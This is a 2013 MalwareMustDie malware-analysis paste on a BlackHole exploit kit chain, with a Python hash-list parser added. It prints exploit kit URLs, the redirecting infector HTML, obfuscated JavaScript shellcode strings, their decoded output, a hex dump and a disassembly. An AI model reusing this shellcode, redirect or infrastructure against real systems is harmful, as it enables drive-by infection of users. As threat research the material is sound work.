MalwareMustDie

#MMD - BlackHole EK w/GeoIP Double infector(Cridex+Ransomer)

Feb 18th, 2013
===================================================
#MalwareMustDie!
BlackHole Exploit Kit with Double infector:
Cridex & FakeAV/Ransomer (depends on your request IP)
Infector: h00p://webworks.investorship.co.jp/page-329.htm
Landing page/BHEK: h00p://46.175.224.21:8080/forum/links/public_version.php
All of the cracked infectors download urls:
//JARS
..using the applet in the same url as landing page (2 JARS found)
//PDF:
h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
//SWF
h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
//Payloads:
h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r

The catches:
--------------
2013/02/18 15:08 2e9e095f7f276c495a0080b656e81d72 94,208 about.exe
2013/02/18 15:54 80930719764cb6c41840156800ee54f9 7,981 flash1.swf
2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash2.swf
2013/02/18 15:55 80930719764cb6c41840156800ee54f9 7,981 flash3.swf
2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash4.swf
2013/02/18 14:31 04022dd9cb3b5c236ec1e0e07d1a6ec1 13,873 java1.jar
2013/02/18 14:33 36df7f936b42abe2ccff75544f08f9f2 12,968 java2.jar
2013/02/18 13:54 96c6c9a9346a360d07236d5bd021adc1 434 page-329.htm
2013/02/18 15:50 6cfb52ab36855801313742a90593c6ec 20,161 pdf1.pdf
2013/02/18 15:50 40e02231bf9ffe321289cccae0191fd4 11,194 pdf2.pdf
2013/02/18 15:51 a57fcffb1040048e63b9f81b6ec096bf 20,161 pdf3.pdf
2013/02/18 15:52 df86cbbc78748287e62be9a1248711ea 11,160 pdf4.pdf
2013/02/18 14:13 b5de89429d354f138d59673e88907b3b 118,326 public_version-2..php
2013/02/18 14:16 a5acd12a633e01d575976de4423b8642 118,301 public_version.php
2013/02/18 15:08 04e9d4167c9a1b82e622e04ad85f8e99 279,040 readme.exe
-----
Total: 2 SWF, 4 PDF, 2 Jars, 2 Payloads

Infector found by @Hulk_Crusader, followed: @unixfreaxjp, GeoIP analysis: @it4sec
=================================================================
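The "Total" line counts distinct content rather than files saved: four SWF files were fetched but only two md5 values appear among them, while the four PDFs all differ. The following is an added example (not part of the original paste, not MalwareMustDie tooling) that parses the catch list exactly as it is laid out above (date, time, md5, size, name) and reports, per file type, how many files were saved versus how many distinct hashes they represent, plus which file names share a hash. The only input is the list copied from the page.

```python
import re
from collections import defaultdict

# The "catches" list from the page, copied verbatim: date time md5 size name.
CATCHES = """\
2013/02/18 15:08 2e9e095f7f276c495a0080b656e81d72 94,208 about.exe
2013/02/18 15:54 80930719764cb6c41840156800ee54f9 7,981 flash1.swf
2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash2.swf
2013/02/18 15:55 80930719764cb6c41840156800ee54f9 7,981 flash3.swf
2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash4.swf
2013/02/18 14:31 04022dd9cb3b5c236ec1e0e07d1a6ec1 13,873 java1.jar
2013/02/18 14:33 36df7f936b42abe2ccff75544f08f9f2 12,968 java2.jar
2013/02/18 13:54 96c6c9a9346a360d07236d5bd021adc1 434 page-329.htm
2013/02/18 15:50 6cfb52ab36855801313742a90593c6ec 20,161 pdf1.pdf
2013/02/18 15:50 40e02231bf9ffe321289cccae0191fd4 11,194 pdf2.pdf
2013/02/18 15:51 a57fcffb1040048e63b9f81b6ec096bf 20,161 pdf3.pdf
2013/02/18 15:52 df86cbbc78748287e62be9a1248711ea 11,160 pdf4.pdf
2013/02/18 14:13 b5de89429d354f138d59673e88907b3b 118,326 public_version-2..php
2013/02/18 14:16 a5acd12a633e01d575976de4423b8642 118,301 public_version.php
2013/02/18 15:08 04e9d4167c9a1b82e622e04ad85f8e99 279,040 readme.exe
"""

# One row of the catch list: date, time, 32-hex md5, size with thousands commas, file name.
ROW = re.compile(r"^(\d{4}/\d{2}/\d{2}) (\d{2}:\d{2}) ([0-9a-f]{32}) ([\d,]+) (\S+)$")


def parse_catches(text):
    """Turn the catch list into dicts; separators and headings are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        date, time, md5, size, name = m.groups()
        rows.append({
            "when": f"{date} {time}",
            "md5": md5,
            "size": int(size.replace(",", "")),
            "name": name,
            "ext": name.rsplit(".", 1)[-1].lower(),
        })
    return rows


def count_by_type(rows):
    """Per extension: (files saved, distinct md5 values)."""
    files = defaultdict(int)
    hashes = defaultdict(set)
    for r in rows:
        files[r["ext"]] += 1
        hashes[r["ext"]].add(r["md5"])
    return {ext: (files[ext], len(hashes[ext])) for ext in files}


def identical_files(rows):
    """File names that share an md5, i.e. the same content served more than once."""
    by_md5 = defaultdict(list)
    for r in rows:
        by_md5[r["md5"]].append(r["name"])
    return {h: names for h, names in by_md5.items() if len(names) > 1}


if __name__ == "__main__":
    rows = parse_catches(CATCHES)
    for ext, (saved, distinct) in sorted(count_by_type(rows).items()):
        print(f"{ext:4s} saved={saved} distinct={distinct}")
    for h, names in identical_files(rows).items():
        print(f"{h} -> {', '.join(names)}")
```

Run as-is it reports `swf saved=4 distinct=2` and `pdf saved=4 distinct=4`, which is the same accounting as the page's "2 SWF, 4 PDF"; the identical-hash map pairs flash1 with flash3 and flash2 with flash4.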

// infector:

h00p://webworks.investorship.co.jp/page-329.htm

--2013-02-18 14:11:12-- h00p://webworks.investorship.co.jp/page-329.htm
Resolving webworks.investorship.co.jp... seconds 0.00, 117.20.100.110
Caching webworks.investorship.co.jp => 117.20.100.110
Connecting to webworks.investorship.co.jp|117.20.100.110|:80... seconds 0.00, connected.
:
GET /page-329.htm h00p/1.0
Host: webworks.investorship.co.jp
h00p request sent, awaiting response...
:
h00p/1.1 200 OK
Date: Mon, 18 Feb 2013 05:11:05 GMT
Server: Apache
Last-Modified: Mon, 18 Feb 2013 04:54:14 GMT
ETag: "1185062d-1b2-5121b3f6"
Accept-Ranges: bytes
Content-Length: 434
Connection: close
Content-Type: text/html
:
200 OK
Length: 434 [text/html]
Saving to: `page-329.htm'
2013-02-18 14:11:12 (9.15 MB/s) - `page-329.htm' saved [434/434]


//-------cat---------------

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>


<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://46.175.224.21:8080/forum/links/public_version.php";}
</script>


</body>
</html>

// -----------landing page/is a BHEK moronz.----------------------


--2013-02-18 14:13:40-- h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php http/1.0
Referer: h00p://webworks.investorship.co.jp/page-329.htm
Host: 46.175.224.21:8080
http request sent, awaiting response...
:
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:13:34 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding

http/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:16:04 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: `public_version.php'
2013-02-18 14:16:13 (95.7 KB/s) - `public_version.php' saved [118301]


// -----------------checks the jars..---------------------


// get java old....

--2013-02-18 14:31:39-- h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php http/1.0
User-Agent: Java/1.6.0_23
Host: 46.175.224.21:8080
h00p request sent, awaiting response...
:
h00p/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:31:33 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 13873
ETag: "04022dd9cb3b5c236ec1e0e07d1a6ec1"
Last-Modified: Mon, 18 Feb 2013 05:31:33 GMT
Accept-Ranges: bytes
:
200 OK
Length: 13873 (14K) [application/java-archive]
Saving to: `java1.jar'
2013-02-18 14:31:41 (21.7 KB/s) - `java1.jar' saved [13873/13873]


// get java newer...

--2013-02-18 14:33:22-- h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php http/1.0
User-Agent: Java/1.7.0_09
Host: 46.175.224.21:8080
h00p request sent, awaiting response...
:
h00p/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:33:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 12968
ETag: "36df7f936b42abe2ccff75544f08f9f2"
Last-Modified: Mon, 18 Feb 2013 05:33:15 GMT
Accept-Ranges: bytes
:
200 OK
Length: 12968 (13K) [application/java-archive]
Saving to: `./java2.jar'
2013-02-18 14:33:23 (41.0 KB/s) - `./java2.jar' saved [12968/12968]


// -------------------------------------------------------

// see both plugin-detects....
// it has different shellcodes... two payloads...
// has 2 PDF, 2 SWF, 2 JARS each payload
// PD1.txt : http://pastebin.com/raw.php?i=CpRXS5m3
// and PD2.txt : http://pastebin.com/raw.php?i=MkYVRz4R
// ==========================================================================

// ========================================
// get the deobs + crack both shellcodes:
// ========================================

  199. var a = "8200!%1482!%0451!%e024!%5185!%7415!%34e0!%5191!%e0c5!%9114!%7421!%2191!%9164!%7421!%2191!%9114!%f421!%2191!%9144!%a121!%21b1!%b1b1!%2421!%5191!%24d4!%e4e0!%2191!%b1a1!%2421!%2191!%9124!%0421!%5191!%64e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var xxx= a["replace"](/\%!/g, "%" + "u");
document.write(xxx);

  203. var b = "8200!%a582!%e551!%e0e5!%5185!%5404!%34e0!%5191!%e095!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%f5d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%c5e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var yyy= b["replace"](/\%!/g, "%" + "u");
document.write("\n\n"+yyy);

// output:

  209. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e46%u1915%u1240%u4219%u1912%u1242%u1a1b%u1912%u0e4e%u4d42%u1915%u1242%u1b1b%u1b12%u121a%u4419%u1912%u124f%u4119%u1912%u1247%u4619%u1912%u1247%u4119%u5c0e%u1915%u0e43%u5147%u5815%u420e%u1540%u2841%u0028
  211. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e5c%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d5f%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u590e%u1915%u0e43%u4045%u5815%u5e0e%u155e%u285a%u0028


// ========================
// shellcode analysis...
// ========================

// break the eggs... no text...one time...

// raws...

// view...
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
5a 5b 41 47 46 06 58 40 58 17 5c 4e 15 1b 18 12 Z[AGF.X@X.\N....
19 46 12 19 41 12 19 41 12 1b 1b 0e 5f 4d 15 1a .F..A..A...._M..
5e 12 19 43 12 19 45 12 1b 1a 12 1b 1b 12 19 43 ^..C..E........C
12 19 43 12 1b 19 12 19 42 12 19 47 0e 59 15 19 ..C.....B..G.Y..
43 0e 45 40 15 58 0e 5e 5e 15 5a 28 28 00 C.E@.X.^^.Z((.

//disasm..
00000000 41 inc ecx
00000001 41 inc ecx
00000002 41 inc ecx
00000003 41 inc ecx
00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
00000008 EBFC jmp short 0x6 ; loop
0000000A 58 pop eax
0000000B 10C9 adc cl,cl
0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
00000013 FE db 0xfe
00000014 2830 sub [eax],dh ; math
00000016 E240 loop 0x58 ; loop
00000018 EBFA jmp short 0x14 ; loop
0000001A E805FFEBFF call dword 0xffebff24 ; call
0000001F FFCC dec esp
00000021 AD lodsd
00000022 1C5D sbb al,0x5d
00000024 77C1 ja 0xffffffe7
00000026 E81BA34C18 call dword 0x184ca346 ; call
0000002B 6868A3A324 push dword 0x24a3a368
00000030 3458 xor al,0x58 ; decryption
00000032 A37E205EF3 mov [0xf35e207e],eax
00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
0000003D 2B041B sub eax,[ebx+ebx] ; math
00000040 C6 db 0xc6
00000041 A9383DD7D7 test eax,0xd7d73d38
00000046 A39018686E mov [0x6e681890],eax
0000004B EB2E jmp short 0x7b ; loop
0000004D 11D3 adc ebx,edx
0000004F 5D pop ebp
00000050 1CAF sbb al,0xaf
00000052 AD lodsd
00000053 0C5D or al,0x5d
00000055 CC int3
00000056 C17964C3 sar dword [ecx+0x64],0xc3
0000005A 7E79 jng 0xd5
0000005C 5D pop ebp
0000005D A3A3141D5C mov [0x5c1d14a3],eax
00000062 2B507E sub edx,[eax+0x7e] ; math
00000065 DD5EA3 fstp qword [esi-0x5d]
00000068 2B08 sub ecx,[eax] ; math
0000006A 1BDD sbb ebx,ebp
0000006C 61 popad
0000006D E1D4 loope 0x43
0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
0000007C E3E9 jecxz 0x67
0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
00000084 37 aaa
00000085 13CE adc ecx,esi
00000087 5D pop ebp
00000088 A3760C76F5 mov [0xf5760c76],eax
0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
00000093 A5 movsd
00000094 D7 xlatb
00000095 C40C7C les ecx,[esp+edi*2]
00000098 A3242BF0A3 mov [0xa3f02b24],eax
0000009D F5 cmc
0000009E A32CED2B76 mov [0x762bed2c],eax
000000A3 83EB71 sub ebx,byte +0x71 ; math
000000A6 7BC3 jpo 0x6b
000000A8 A385084055 mov [0x55400885],eax
000000AD A81B test al,0x1b
000000AF 242B and al,0x2b
000000B1 5C pop esp
000000B2 C3 ret
000000B3 BEA3DB2040 mov esi,0x4020dba3
000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
000000BE D7 xlatb
000000BF B0D7 mov al,0xd7
000000C1 D7 xlatb
000000C2 D1CA ror edx,1 ; bitwise cipher
000000C4 28C0 sub al,al ; math
000000C6 2828 sub [eax],ch ; math
000000C8 7028 jo 0xf2
000000CA 42 inc edx
000000CB 7840 js 0x10d
000000CD 6828D72828 push dword 0x2828d728
000000D2 AB stosd
000000D3 7831 js 0x106
000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
000000DA 76A3 jna 0x7f
000000DC AB stosd
000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
000000E3 40 inc eax
000000E4 284640 sub [esi+0x40],al ; math
000000E7 285A5D sub [edx+0x5d],bl ; math
000000EA 45 inc ebp
000000EB 44 inc esp
000000EC D7 xlatb
000000ED 7CAB jl 0x9a
000000EF 3E20EC ds and ah,ch
000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
000000F9 D7 xlatb
000000FA C3 ret
000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
00000107 240C and al,0xc
00000109 2C4D sub al,0x4d ; math
0000010B 5A pop edx
0000010C 5B pop ebx
0000010D 4F dec edi
0000010E 6C insb
0000010F EF out dx,eax
